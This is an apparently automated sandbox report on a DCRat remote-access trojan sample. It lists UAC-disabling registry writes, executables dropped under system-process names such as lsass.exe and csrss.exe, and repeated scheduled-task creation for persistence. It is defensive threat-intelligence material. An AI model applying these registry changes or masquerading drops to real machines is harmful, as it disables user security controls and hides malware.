Malware Analysis Report

2024-11-15 05:49

Sample ID 240514-x3rflacg64
Target 1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics
SHA256 a9ac10090fed177df3867fc88eda57dd852c595dde10953b7b798523e1043152
Tags: rat dcrat evasion execution infostealer trojan
Score: 10/10

Table of Contents

  Analysis Overview
  MITRE ATT&CK
    Enterprise Matrix V15
  Analysis: static1
    Detonation Overview
    Signatures
  Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
  Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score: 10/10

SHA256: a9ac10090fed177df3867fc88eda57dd852c595dde10953b7b798523e1043152

Threat Level: Known bad

The file 1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics was found to be: Known bad.

Malicious Activity Summary

Tags: rat dcrat evasion execution infostealer trojan

UAC bypass

Dcrat family

DCRat payload

DcRat

Process spawned unexpected child process

DCRat payload

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Executes dropped EXE

Checks whether UAC is enabled

Drops file in Windows directory

Drops file in Program Files directory

Unsigned PE

Enumerates physical storage devices

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: CmdExeWriteProcessMemorySpam

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

System policy modification

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-05-14 19:23

Signatures

DCRat payload

Tags: rat
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Dcrat family

Tags: dcrat

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-05-14 19:23
Reported: 2024-05-14 19:25
Platform: win7-20240221-en
Max time kernel: 150s
Max time network: 154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe"

Signatures

DcRat

Tags: rat infostealer dcrat

Process spawned unexpected child process

Description | Indicator | Process | Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe

UAC bypass

Tags: evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe | N/A

DCRat payload

Tags: rat
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Checks whether UAC is enabled

Tags: evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe | N/A
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe | N/A
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe | N/A
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe | N/A
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe | N/A
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe | N/A
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe | N/A

Drops file in Program Files directory

Description | Indicator | Process | Target
File created | C:\Program Files (x86)\Windows Mail\en-US\spoolsv.exe | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Mail\en-US\RCXB01F.tmp | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
File opened for modification | C:\Program Files (x86)\Google\Update\services.exe | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Mail\en-US\RCXB030.tmp | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Mail\en-US\spoolsv.exe | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
File created | C:\Program Files (x86)\Google\Update\services.exe | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
File created | C:\Program Files (x86)\Google\Update\c5b4cb5e9653cc | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
File created | C:\Program Files (x86)\Windows Mail\en-US\f3b6ecef712a24 | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
File opened for modification | C:\Program Files (x86)\Google\Update\RCXA8BA.tmp | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
File opened for modification | C:\Program Files (x86)\Google\Update\RCXA8DA.tmp | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File created | C:\Windows\LiveKernelReports\lsass.exe | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
File opened for modification | C:\Windows\debug\WIA\RCXB92B.tmp | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
File created | C:\Windows\ShellNew\886983d96e3d3e | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
File created | C:\Windows\debug\WIA\smss.exe | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
File opened for modification | C:\Windows\LiveKernelReports\RCXAB8A.tmp | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
File opened for modification | C:\Windows\LiveKernelReports\lsass.exe | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
File created | C:\Windows\LiveKernelReports\6203df4a6bafc7 | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
File opened for modification | C:\Windows\LiveKernelReports\RCXAB0D.tmp | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
File opened for modification | C:\Windows\ShellNew\RCXB707.tmp | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
File opened for modification | C:\Windows\debug\WIA\RCXB91B.tmp | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
File created | C:\Windows\ShellNew\csrss.exe | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
File created | C:\Windows\debug\WIA\69ddcba757bf72 | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
File opened for modification | C:\Windows\ShellNew\RCXB6F7.tmp | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
File opened for modification | C:\Windows\ShellNew\csrss.exe | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
File opened for modification | C:\Windows\debug\WIA\smss.exe | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A

Enumerates physical storage devices

Creates scheduled task(s)

Tags: persistence
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description | Indicator | Process | Target
N/A | N/A | C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
